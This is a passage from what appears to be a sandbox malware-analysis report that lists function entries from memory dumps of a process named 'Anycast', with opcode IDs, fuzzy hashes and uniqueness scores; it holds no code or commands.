                                                                                                                              • Instruction Fuzzy Hash: 81D0A7717411055F8B108BA9ED004DC7BE4CED513271041A6C119D3165C664C9118733
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C32A9D0 Relevance: .0, Instructions: 14COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f9b4e085f66ffd3b87568dfadd9cef20d2b1cb1339c5c337fe452534dcb19322
                                                                                                                              • Instruction ID: c9036725d186898aa2e4ed4b9cc2ecf31e3321c7c633822907ded326fb92be56
                                                                                                                              • Opcode Fuzzy Hash: f9b4e085f66ffd3b87568dfadd9cef20d2b1cb1339c5c337fe452534dcb19322
                                                                                                                              • Instruction Fuzzy Hash: 56D01235301329A7CB055655D500855B72AAF8556832880ADD94D0B706CA33EC43DBD0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0CCC6D48 Relevance: .0, Instructions: 13COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4473804634.000000000CCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCC0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_ccc0000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4b78850f75527f8de1cfeaed4dac72f2f1c7e244db5bfba2bc8d755f618a7a94
                                                                                                                              • Instruction ID: 2b5581ac2c2f6bfc0558d49ddfc318703258c3ee7701db6cb34ef7763247a33b
                                                                                                                              • Opcode Fuzzy Hash: 4b78850f75527f8de1cfeaed4dac72f2f1c7e244db5bfba2bc8d755f618a7a94
                                                                                                                              • Instruction Fuzzy Hash: 30C08C313202244F86049A6EE840C5173DCAF09B6030600EAF508CB732CA91EC008BD0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C325AA7 Relevance: .0, Instructions: 13COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 71b58b4e63b41f9506613598575443f65e5783d135d597f668a17652ecf35001
                                                                                                                              • Instruction ID: 9ff4e31762d8a839b8de5811fa7685ee8993d5637742b4239d91d6837b5fcd3d
                                                                                                                              • Opcode Fuzzy Hash: 71b58b4e63b41f9506613598575443f65e5783d135d597f668a17652ecf35001
                                                                                                                              • Instruction Fuzzy Hash: 95C01252A492CC0FD621CA28E6014A97B429B22254B0406C2ED8A8B2A2E9854F28C692
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C324359 Relevance: .0, Instructions: 8COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b03c0a3db1ca80eb2f32ea3eb6f22777c69c10a907c4e3ccfa9dce91403d865f
                                                                                                                              • Instruction ID: 3d56c53f97554cac72f3901decbc06091507d990bfb211b036e68243173d4c90
                                                                                                                              • Opcode Fuzzy Hash: b03c0a3db1ca80eb2f32ea3eb6f22777c69c10a907c4e3ccfa9dce91403d865f
                                                                                                                              • Instruction Fuzzy Hash: 0EB09237A04018C9DB008A84B4417EDF724E790229F104027C31192400C23201748A91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C323CA0 Relevance: .0, Instructions: 7COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f10671b1500baf96020efe87486c491922707e04d698190b6edef62c6b2ac28f
                                                                                                                              • Instruction ID: caf898f098d1f93b45967a702a794f663dc6eea41e182921d440cb24a8fa8cbf
                                                                                                                              • Opcode Fuzzy Hash: f10671b1500baf96020efe87486c491922707e04d698190b6edef62c6b2ac28f
                                                                                                                              • Instruction Fuzzy Hash: 81B0123304030D4FC6406FA8F565E58377CD940314B90D221A00C069196B6C6C0486D8
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C32CFC0 Relevance: .0, Instructions: 3COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 20aab551d8508576e21c992ee343197502525cc4c4ced80a76d1b949296e5bae
                                                                                                                              • Instruction ID: 18dac5e948607ea46de0e7f33e9864cbf918521e2cba36dc2b45204b05097021
                                                                                                                              • Opcode Fuzzy Hash: 20aab551d8508576e21c992ee343197502525cc4c4ced80a76d1b949296e5bae
                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%